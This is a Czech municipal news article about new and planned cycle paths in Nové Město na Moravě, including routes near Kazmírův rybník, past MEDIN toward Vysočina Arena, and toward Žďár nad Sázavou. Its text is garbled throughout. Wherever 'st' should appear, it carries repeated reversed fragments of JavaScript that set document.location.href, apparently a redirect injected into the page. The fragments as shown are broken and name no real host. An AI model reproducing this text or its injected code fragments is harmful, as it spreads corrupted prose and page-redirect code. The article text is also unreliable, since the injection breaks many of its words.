Rainbow page separator

Nové cyklostezky mají provést cyklisty bezpečně městem

Neděle, 10. července 2022

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Další úseky cyklostezek a jejich vzájemné propojení i nasměrování na již ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové či upravené trasy plánuje novoměstská radnice. Cílem je bezpečné provedení cyklistů přes měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to a napojení na další cyklostezky a cyklotrasy. Aktuálně se chystá vybudování cyklostezky kolem Kazmírova rybníka s návazností na lokalitu pod nemocnicí. Záhy přibude nová část cyklostezky vedoucí kolem firmy MEDIN, kudy se jezdí do Vysočina Areny a pak dál ve směru k Vlachovicím. Rozšířením stávajícího chodníku tam vznikne obousměrná komunikace pro pěší i cyklisty. Ve výhledu je stezka směřující ke Žďáru nad Sázavou, která by cykloturisty od nemocnice přes Radňovice, Jiříkovice a Lhotku přiblížila k okresnímu městu. Nyní je vyřizováno stavební povolení na tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to akci a měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to se poohlíží po vhodných dotačních titulech, které by realizaci cyklostezky mohly podpořit. Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to v souvislosti s trendem rozvoje cyklodopravy a propojování stezek ve městě i jeho blízkosti postupuje po etapách. Například v návaznosti na cyklostezku v ulici Petrovická směrem k lomu byla opravena stezka vedoucí k Nové Vsi, odkud se pak cyklisté dostanou k Dlouhému či do Křídel.